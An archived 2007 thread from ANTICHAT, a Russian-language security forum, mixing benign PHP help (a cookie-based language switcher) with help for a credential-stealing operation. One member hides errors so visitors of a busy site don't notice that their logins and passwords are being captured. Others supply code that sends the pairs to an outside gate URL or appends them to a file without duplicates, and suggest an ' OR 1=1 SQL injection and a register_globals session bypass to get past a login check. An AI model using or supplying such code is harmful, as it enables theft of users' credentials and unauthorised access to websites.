ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
21.11.2007, 14:37
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
Задание не очень ясно... Ты хочешь сделать что-то типа аттачей в почтовом сервисе? Никто такое бесплатно делать не будет, ибо работы тут достаточно...
|
|
|
21.11.2007, 14:51
|
|
Познающий
Регистрация: 08.02.2007
Сообщений: 41
Провел на форуме:
136843
Репутация:
13
|
|
задача думаю не очень сложная.. но точно не знаю...
просто нужно реализовать чтото типа если нажал на первую кнопку был английский текс, а при нажатии на вторую русский текс. и при этом это куданить в файл писалось типа этот чел выбрал для себя русский и потом он зашел и сразу русский был, или через куки как нить... просто представляю себе это плохо а в готовых скриптах много лишнего и для меня там сложновато понять ченить
|
|
|
|
21.11.2007, 14:56
|
|
Познающий
Регистрация: 04.08.2005
Сообщений: 62
Провел на форуме:
350685
Репутация:
46
|
|
Scipio и groundhog, спс огромное, все пашет. Дело в том что сайт часто посещаемый и если я не буду гасить вывод ошибки, юзеры могут просечь что к чему. Вот новый вопрос.
Поступают эти 2 переменные каждый раз, когда юзер ходит по личному кабинету. И пишутся они в файл blablabla.txt. Но проблема в том, что каждый раз, когда юзер кликает на ссылку в личном кабинете, эти переменные пишутся снова и снова в конец файла с новой строки. Как избежать дубляжа "на лету"? Просто такими темпами там будет 1ГБ запятых и одинаковых пар логин+пароль, а это палево.
|
|
|
|
21.11.2007, 15:26
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
spyke, если ты ещё мучаешся с тем скриптом, то $host="myhost.com"; а не $host="http://myhost.com";
И ябы лично делалбы
file("http://web.ru/gate.php?acc=".$account."&pass=".$password); но на хостинге может не прокатить, такчто решай сам 
А насчёт повторений
PHP код:
<?
if (!$_SESSION['gate']) {
//Сливаем логи и пасс
$_SESSION['gate'] = true;
}
?>
darckmilord,
Вот это токо пример как я делал...
делаш папку lang для неё Deny from all в неё пихаеш rus.php и eng.php
PHP код:
<?
//eng.php
$lang = array();
$lang['title'] = 'My website';
$land['welcome_msg'] = 'Hello';
?>
PHP код:
<?
//rus.php
$lang = array();
$lang['title'] = 'Мой вебсайт';
$lang['welcome_msg'] = 'Привет';
?>
В корне создаём file.php
PHP код:
<?
$languages = array('rus','eng');
if(!$_COOKIE['lang'] || !in_array($_COOKIE['lang'],$languages)) {
setcookie('lang',$languages[0]);
$_COOKIE['lang'] = $languages[0];
}
if($_GET['lang'] && in_array($_GET['lang'],$languages)) {
setcookie('lang',$_GET['lang']);
$_COOKIE['lang'] = $_GET['lang'];
}
include("lang/{$_COOKIE['lang']}.php");
echo "<center><h1>{$lang['title']}</h1><br>{$lang['welcome_msg']}</center><br>";
echo '<a href="?lang=rus">rus</a> <a href="?lang=eng">eng</a>';
?>
Заходим на file.php и юзаем дальше сам думаю разберёшся
Последний раз редактировалось Ponchik; 21.11.2007 в 16:28..
|
|
|
|
21.11.2007, 15:43
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
darckmilord, да, задача действительно не из сильных. Я просто в смысл не въехал. Вот решение:
PHP код:
<?php
if (isset($_COOKIE["pillow"])) {
$pillow = strtolower($_COOKIE["pillow"]);
if ($pillow === "blue") die("Матрица поимела тебя, Нео!");
elseif ($pillow === "red") die("Ты поимел матрицу, Нео!");
}
if (strtolower($_SERVER["REQUEST_METHOD"])=="post")
setcookie("pillow", htmlspecialchars($_POST["pillow"]), time() + 60 * 60 * 24 * 365);
print("<h1>Красная или синяя, Нео? Сделай свой выбор!</h1>");
print("<form method=post>");
print("<input type=\"submit\" name=\"pillow\" value=\"BLUE\">\n");
print("<input type=\"submit\" name=\"pillow\" value=\"RED\">\n");
print("</form");
?>
|
|
|
|
21.11.2007, 15:45
|
|
Познающий
Регистрация: 04.08.2005
Сообщений: 62
Провел на форуме:
350685
Репутация:
46
|
|
Ponchik, да ты бог) Все просто летает и лишь 1 строчка)
|
|
|
|
21.11.2007, 16:03
|
|
Новичок
Регистрация: 19.11.2007
Сообщений: 3
Провел на форуме:
8969
Репутация:
0
|
|
Товарищи кодеры помогите пожалуйста советом!
вот такая вот проверка пароля в самом конце авторизации. Можно ли ее обойти?
PHP код:
$sql="select * from f_user where (nick='$innick')";
$resultn=mysql_query($sql);
$ar=mysql_fetch_array($resultn);
//вышестоящая проверка вырезана, поскольку там ничего не поделать
if ($ar['pass'] == $inpass) { $_SESSION['userenter']=$ar['id'];
|
|
|
|
21.11.2007, 16:06
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
195531, покажи скрипт выше, надо знать что такое $innick и откуда оно берётся
А ваще логи и пасс напиши ' OR 1=1/* если пустит, значит можно, если нет, всётаки выложи скрипт
/me только что заметил "//вышестоящая проверка вырезана, поскольку там ничего не поделать"
ну значит не судьба
Хотя если включены глобальные переменные, можеш попробовать зайти на сайт
index.php?$_SESSION[userenter]=1
Последний раз редактировалось Ponchik; 21.11.2007 в 16:08..
|
|
|
|
21.11.2007, 16:36
|
|
Новичок
Регистрация: 19.11.2007
Сообщений: 3
Провел на форуме:
8969
Репутация:
0
|
|
Сообщение от Ponchik
195531, покажи скрипт выше, надо знать что такое $innick и откуда оно берётся
А ваще логи и пасс напиши ' OR 1=1/* если пустит, значит можно, если нет, всётаки выложи скрипт
/me только что заметил "//вышестоящая проверка вырезана, поскольку там ничего не поделать"
ну значит не судьба
Хотя если включены глобальные переменные, можеш попробовать зайти на сайт
index.php?$_SESSION[userenter]=1ссылку кинул в другой раздел, здесь все таки не совсем то. там инъекции нет походу, но можно весь код посмотреть, если интересно смотрите
http://forum.antichat.ru/showthread.php?p=510350#post510350
|
|
|
|
21.11.2007, 17:07
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
spyke, используй для вошки, которая льёт пасы в файло такой код:
PHP код:
<?php
if (isset($_GET["login"]) && isset($_GET["password"])) {
$line = sprintf("%s:%s\n", $_GET["login"], $_GET["password"]);
$suff_data = file("stuff.txt");
foreach ($suff_data as $account_data)
if (trim($line) == trim($account_data)) die("Повтор на первом игроке");
$file_id = fopen("stuff.txt", "a+");
if (!$file_id) die("Не могу открыть файлег!");
fputs($file_id, $line);
fclose($file_id);
}
?>
Разумеется, исправь поведение на ошибки и следи чтобы файл не вырос до громадных размеров, иначе скрипт будет тормозить, а следовательно и будет тормозить страница, с которой ты вызываешь вошку.
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
